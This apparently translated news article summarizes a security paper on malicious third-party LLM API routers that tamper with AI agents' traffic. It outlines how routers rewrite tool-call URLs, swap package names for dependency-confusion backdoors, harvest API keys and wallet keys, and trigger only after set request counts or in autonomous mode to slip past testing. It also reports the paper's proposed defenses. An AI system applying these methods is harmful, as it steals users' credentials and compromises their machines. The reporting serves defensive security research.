Still buying AI transfer stations on Taobao? Claude Code source code whistleblower: At least dozens have been poisoned

Claude Code source code leak incident whistleblower’s latest research reveals hidden cybersecurity risks in commercial AI intermediary stations. Real-world tests find that some intermediary stations steal credentials, wallet private keys, or inject malicious code, turning them into nodes for supply-chain attacks.

Claude Code source code leak incident whistleblower reveals cybersecurity risks of AI intermediary stations

Recently, a research paper titled “Your Agent Is Mine” has been published. One of the authors is Chaofan Shou, the whistleblower who was the first to expose the Claude Code source code leak incident.

This paper is the first to conduct a systematic security threat study of third-party API routers for large language models (LLMs)—commonly known as intermediary stations—and reveals that these types of intermediary stations may become nodes in supply-chain attacks.

What is an AI intermediary station?

Because calling LLMs consumes a large number of tokens and results in high computing costs, AI intermediary stations can help customers significantly reduce expenses by caching and reusing repeated problem background explanations.

At the same time, intermediary stations also have an automatic model allocation function: they can dynamically switch between different billing standards and performance models based on the difficulty level of a user’s questions, and they can automatically switch to backup models when a single model server goes offline to ensure overall service connection stability.

Intermediary stations are especially popular in China, because the country cannot directly access certain specific overseas AI products, and with enterprises’ demand for localized billing, intermediary stations have become an important bridge connecting upstream model providers and downstream developers. Platforms such as OpenRouter and SiliconFlow also fall within this category.

However, despite appearing to lower costs and technical barriers, intermediary stations hide a significant cybersecurity risk behind the scenes.

Image source: Research paper reveals supply-chain attack risks of AI intermediary stations

AI intermediary stations have full access rights, making them supply-chain attack vulnerabilities

The paper points out that intermediary stations operate at the application layer of the network architecture and have full plaintext read access to JSON payload data during transmission.

Because there is no end-to-end encryption integrity verification between the client and the upstream model provider, the intermediary station can easily inspect and tamper with API keys, system prompt words, and tool invocation parameters in the model’s output.

The research team notes that as early as March 2026, the well-known open-source router LiteLLM was already targeted by a dependency confusion attack, allowing attackers to inject malicious code into the request processing pipeline, highlighting the vulnerability of this component.

• **Related report:**LiteLLM hacker poisoning incident explainer: How to check whether your encrypted crypto wallet or cloud keys are compromised?

Real-world tests show dozens of AI intermediary stations exhibit malicious behavior

The research team actually purchased 28 paid intermediary stations on platforms such as Taobao, Xianyu, and Shopify, and collected 400 free intermediary stations from public communities for in-depth testing. The real-world results found that a total of 1 paid intermediary station and 8 free intermediary stations would proactively inject malicious code.

Among the tested samples of free intermediary stations, 17 intermediary stations attempted to use AWS decoy credentials set up by the researchers, and 1 intermediary station directly stole encrypted cryptocurrency from the researchers’ Ethereum wallets.

The research data further shows that as long as intermediary stations reuse leaked upstream credentials, or route traffic to nodes with weaker security defenses, even intermediary stations that originally appeared normal can be forced into the same attack surface.

During the poisoning tests, the research team found that these implicated nodes processed more than 2.1 billion tokens in total, and exposed 99 real credentials across 440 sessions; furthermore, 401 sessions were in a fully autonomous operating state, enabling attackers to inject malicious payloads directly and easily, without needing complex trigger conditions.

Image source: Research paper tested over 400 intermediary stations; the results reveal that dozens of AI intermediary stations have malicious behavior

Four core attack methods unveiled

The paper categorizes the attack behaviors of malicious intermediary stations into two main core categories and two types of adaptive evasion variants.

• Payload injection attacks: After the upstream model returns results, the intermediary station secretly alters tool invocation parameters—for example, replacing a legitimate URL with a server controlled by the attacker—causing the client to execute malicious code.
• Sensitive data leakage attacks: The intermediary station passively scans transmitted traffic, intercepts and steals sensitive information such as API keys, Amazon Web Services (AWS) credentials, and Ethereum private keys.

To evade routine cybersecurity detection, attackers further evolved a dependency confusion-based target injection method: they specifically alter the package names in software installation commands, replacing the legitimate package with a malicious package of the same name or easily confused name that has been published in advance on a public registry, thereby establishing a persistent supply-chain backdoor within the target system.

Another method is conditional delivery, where malicious actions are triggered only under specific conditions—for example, when the number of requests exceeds 50, or when a system is detected to be operating in a fully autonomous mode (YOLO mode)—so that the attack can evade security review tests limited to a finite number of attempts.

Three feasible defense measures

In response to supply-chain attacks involving poisoning in AI intermediary stations, the paper proposes three feasible defense measures:

• Implement policy gateways for high-risk tools: By checking and blocking unauthorized domains or package installation commands, this mechanism can block most payload injection attacks with a 1% false positive rate.
• Response-end anomaly filtering mechanism: At a false positive rate of 6.7%, it can flag 89% of malicious payload samples, effectively helping developers conduct manual review.
• Add transparency log recording: While this cannot prevent attacks from occurring, it can store request and response hash values, enabling traceability and damage assessment when a security incident occurs.

Call on upstream model providers to establish cryptographic verification mechanisms

Although client-side defense mechanisms can reduce some risks at this stage, they cannot fundamentally resolve the vulnerability in source identity authentication. As long as the intermediary station’s modification behavior does not trigger abnormal alerts on the client side, attackers can still easily change the semantics of program execution and carry out sabotage.

To fully ensure the security of the AI agent ecosystem, the final reliance must be on response mechanisms that support cryptographic verification provided by upstream model providers. Only by rigorously cryptographically binding the model-produced results to the final execution commands on the client can end-to-end data integrity be ensured and supply-chain risks from intermediary tampering be comprehensively prevented.

Further reading:
OpenAI’s Mixpanel got into trouble! Leads to some users’ personal data leaking—watch out for phishing emails

A copy-paste error caused $50 million to evaporate! Crypto address poisoning scams are back—how to prevent them